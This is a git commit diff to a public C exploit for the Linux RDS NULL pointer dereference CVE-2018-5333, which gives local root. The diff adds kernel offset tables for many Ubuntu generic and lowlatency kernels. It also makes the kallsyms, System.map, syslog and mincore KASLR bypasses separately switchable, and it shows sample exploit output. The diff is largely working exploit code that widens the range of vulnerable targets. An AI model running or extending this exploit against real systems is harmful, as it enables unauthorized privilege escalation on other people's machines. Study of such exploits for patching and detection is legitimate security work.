Merge pull request bcoles#19 from bcoles/cve-2018-5333

bcoles · web-flow · commit 599d5d8974d0 · 2019-12-18T00:51:13.000+11:00
[CVE-2018-5333] Add lowlatency kernel offsets
diff --git a/CVE-2018-5333/cve-2018-5333.c b/CVE-2018-5333/cve-2018-5333.c
@@ -51,7 +51,7 @@
 // ---
 // $ gcc cve-2018-5333.c -o cve-2018-5333
 // $ ./cve-2018-5333
-// Linux RDS rds_atomic_free_op NULL pointer dereference local root
+// Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)
 // [.] starting
 // [.] checking kernel version...
 // [.] kernel version '4.4.0-116-generic #140-Ubuntu' detected
@@ -63,8 +63,8 @@
 // [.] KASLR bypass enabled, getting kernel addr
 // [.] trying /proc/kallsyms...
 // [-] kernel base not found in /proc/kallsyms
-// [.] trying /boot/System.map-4.4.0-116-lowlatency...
-// [-] open/read(/boot/System.map-4.4.0-116-lowlatency)
+// [.] trying /boot/System.map-4.4.0-116-generic...
+// [-] open/read(/boot/System.map-4.4.0-116-generic)
 // [.] trying syslog...
 // [-] kernel base not found in syslog
 // [.] trying mincore info leak...
@@ -102,7 +102,6 @@
 #include <netinet/in.h>
 #include <signal.h>
 #include <setjmp.h>
-#include <execinfo.h>
 #include <ucontext.h>
 
 #define DEBUG
@@ -113,13 +112,20 @@
 #  define dprintf
 #endif
 
-#define ENABLE_SYSTEM_CHECKS 1
-#define ENABLE_KASLR_BYPASS  1
+#define ENABLE_SYSTEM_CHECKS            1
+#define ENABLE_KASLR_BYPASS             1
+
+#if ENABLE_KASLR_BYPASS
+#  define ENABLE_KASLR_BYPASS_KALLSYSMS 1
+#  define ENABLE_KASLR_BYPASS_SYSMAP    1
+#  define ENABLE_KASLR_BYPASS_SYSLOG    1
+#  define ENABLE_KASLR_BYPASS_MINCORE   1
+#endif
 
 // Can be overwritten by argv[1]
 char *SHELL = "/bin/sh";
 
-// Will be overwritten if ENABLE_KASLR_BYPASS
+// Will be overwritten if ENABLE_KASLR_BYPASS is enabled (1)
 unsigned long KERNEL_BASE = 0xffffffff81000000ul;
 
 // Will be overwritten by detect_versions().
@@ -143,9 +149,16 @@ struct kernel_info kernels[] = {
   { "4.4.0-31-generic #50-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x1787a7, 0x3ffed8, 0x64644, 0x7d125  },
   { "4.4.0-38-generic #57-Ubuntu",   0xa2570, 0xa2960, 0x5d0c5, 0x178a97, 0x400968, 0x64634, 0x7d1e5  },
   { "4.4.0-42-generic #62-Ubuntu",   0xa25c0, 0xa29b0, 0x5d0c5, 0x178ac7, 0x400d78, 0x64634, 0x7d1a5  },
+  { "4.4.0-109-generic #132-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
   { "4.4.0-112-generic #135-Ubuntu", 0xa3a90, 0xa3e80, 0x5d0c5, 0x17b657, 0x40b238, 0x646a4, 0x54137c },
   { "4.4.0-116-generic #140-Ubuntu", 0xa4cf0, 0xa50e0, 0x5e0c5, 0x17d5d7, 0x40ed08, 0x65734, 0x3a5b04 },
 
+  { "4.4.0-21-lowlatency #37-Ubuntu",   0xa3150, 0xa3560, 0x5e0c5, 0x17b2c7, 0x401288, 0x64d34, 0x7d95c },
+  //{ "4.4.0-31-lowlatency #50-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b9a7, 0x409018, 0x64d34, 0x7dadc },
+  { "4.4.0-38-lowlatency #57-Ubuntu",   0xa3500, 0xa3910, 0x5e0c5, 0x17bcb7, 0x409b38, 0x64d24, 0x4c030 },
+  { "4.4.0-42-lowlatency #62-Ubuntu",   0xa3560, 0xa3970, 0x5e0c5, 0x17bcf7, 0x409f68, 0x64d24, 0x7db6c },
+  { "4.4.0-109-lowlatency #132-Ubuntu", 0xa5530, 0xa5940, 0x5f0c5, 0x17f257, 0x414c18, 0x65d94, 0x7f7ac },
+  { "4.4.0-112-lowlatency #135-Ubuntu", 0xa5bd0, 0xa5fe0, 0x5f0c5, 0x17f9a7, 0x415448, 0x65d94, 0x7f8dc },
   { "4.4.0-116-lowlatency #140-Ubuntu", 0xa6e00, 0xa7210, 0x600c5, 0x1818f7, 0x418a38, 0x66de4, 0x809ef },
 
   { "4.8.0-34-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
@@ -164,6 +177,12 @@ struct kernel_info kernels[] = {
   //{ "4.8.0-56-generic #61~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e278, 0x642f4, 0x7ed3b },
   //{ "4.8.0-58-generic #63~16.04.1-Ubuntu", 0xa5d20, 0xa6110, 0x5d0c5, 0x187797, 0x43dfa8, 0x642f4, 0x7ed5b },
 
+  { "4.8.0-49-lowlatency #52~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x447278, 0x649f4, 0x4b3e3 },
+  { "4.8.0-51-lowlatency #54~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x447278, 0x649f4, 0x4b3e3 },
+  { "4.8.0-52-lowlatency #55~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x4b3e3 },
+  { "4.8.0-53-lowlatency #56~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x4b3e3 },
+  { "4.8.0-54-lowlatency #57~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x7f912 },
+
   //{ "4.10.0-14-generic #16~16.04.1-Ubuntu", 0xab610, 0xaba00, 0x600c5, 0x194ac7, 0x458288, 0x67764, 0x34c4b },
   //{ "4.13.0-16-generic #19~16.04.3-Ubuntu", 0xa8220, 0xa85f0, 0x5f0c5, 0x19c8a7, 0x462d18, 0x668b4, 0x2f2d4 },
   //{ "4.13.0-37-generic #42~16.04.1-Ubuntu", 0xab1d0, 0xab5a0, 0x610c5, 0x1a0827, 0x46bf58, 0x68944, 0x3381b },
@@ -382,6 +401,7 @@ void detect_versions() {
 // * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
 // https://grsecurity.net/~spender/exploits/exploit.txt
 
+#if ENABLE_KASLR_BYPASS_KALLSYSMS
 unsigned long get_kernel_addr_kallsyms() {
   FILE *f;
   unsigned long addr = 0;
@@ -416,10 +436,12 @@ unsigned long get_kernel_addr_kallsyms() {
   dprintf("[-] kernel base not found in %s\n", path);
   return 0;
 }
+#endif
 
 // * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
 // https://grsecurity.net/~spender/exploits/exploit.txt
 
+#if ENABLE_KASLR_BYPASS_SYSMAP
 unsigned long get_kernel_addr_sysmap() {
   FILE *f;
   unsigned long addr = 0;
@@ -456,10 +478,12 @@ unsigned long get_kernel_addr_sysmap() {
   dprintf("[-] kernel base not found in %s\n", path);
   return 0;
 }
+#endif
 
 // * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
 // https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
 
+#if ENABLE_KASLR_BYPASS_SYSLOG
 #define SYSLOG_ACTION_READ_ALL 3
 #define SYSLOG_ACTION_SIZE_BUFFER 10
 
@@ -525,10 +549,12 @@ unsigned long get_kernel_addr_syslog() {
 
   return addr;
 }
+#endif
 
 // * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
 // https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
 
+#if ENABLE_KASLR_BYPASS_MINCORE
 unsigned long get_kernel_addr_mincore() {
   unsigned char buf[getpagesize() / sizeof(unsigned char)];
   unsigned long iterations = 20000000;
@@ -569,23 +595,32 @@ unsigned long get_kernel_addr_mincore() {
   dprintf("[-] kernel base not found in mincore info leak\n");
   return 0;
 }
+#endif
 
 // * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
 
 unsigned long get_kernel_addr() {
   unsigned long addr = 0;
 
+#if ENABLE_KASLR_BYPASS_KALLSYSMS
   addr = get_kernel_addr_kallsyms();
   if (addr) return addr;
+#endif
 
+#if ENABLE_KASLR_BYPASS_SYSMAP
   addr = get_kernel_addr_sysmap();
   if (addr) return addr;
+#endif
 
+#if ENABLE_KASLR_BYPASS_SYSLOG
   addr = get_kernel_addr_syslog();
   if (addr) return addr;
+#endif
 
+#if ENABLE_KASLR_BYPASS_MINCORE
   addr = get_kernel_addr_mincore();
   if (addr) return addr;
+#endif
 
   dprintf("[-] KASLR bypass failed\n");
   exit(EXIT_FAILURE);
@@ -620,7 +655,7 @@ void fork_shell() {
 
 int main(int argc, char *argv[]) {
   if (argc > 1) SHELL = argv[1];
-  dprintf("Linux RDS rds_atomic_free_op NULL pointer dereference local root\n");
+  dprintf("Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)\n");
 
   dprintf("[.] starting\n");
 
